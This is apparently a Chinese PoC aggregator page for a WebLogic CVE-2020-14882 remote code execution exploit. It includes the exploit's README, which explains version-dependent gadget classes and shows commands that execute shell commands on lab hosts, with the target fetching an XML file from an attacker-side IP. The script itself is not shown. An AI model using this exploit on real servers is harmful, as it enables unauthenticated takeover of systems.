POC详情: b9e0af06acd8f6df2caeb209468267cbf7971033

来源
关联漏洞
标题: Oracle WebLogic Server 安全漏洞 (CVE-2020-14882)
描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server 多版本的Oracle Fusion Middleware 存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server。 受影响产品及版本如下: 10.3.6.0.0版本, 12.1.
描述
CVE-2020-14882
介绍
# CVE-2020-14882
CVE-2020-14882

## Description  
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic

## Difference   
For Oracle WebLogic versions before 12.2.1, we need to use the class 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' as the class 'com.tangosol.coherence.mvel2.sh.ShellSession' is not available.
The script automatically switches between the two classes for command execution depending on the versions detected.  

Some of the current scripts available on Github for exploiting CVE-2020-14882 only supports the class 'com.tangosol.coherence.mvel2.sh.ShellSession', which means the scripts will fail on WebLogic versions 10.3.6.0.0 and 12.1.3.0.0.
    
## Steps
```
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
```

```
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
文件快照

[4.0K] /data/pocs/b9e0af06acd8f6df2caeb209468267cbf7971033 ├── [6.7K] CVE-2020-14882.py ├── [ 659] install_weblogic_notes.txt └── [1.9K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。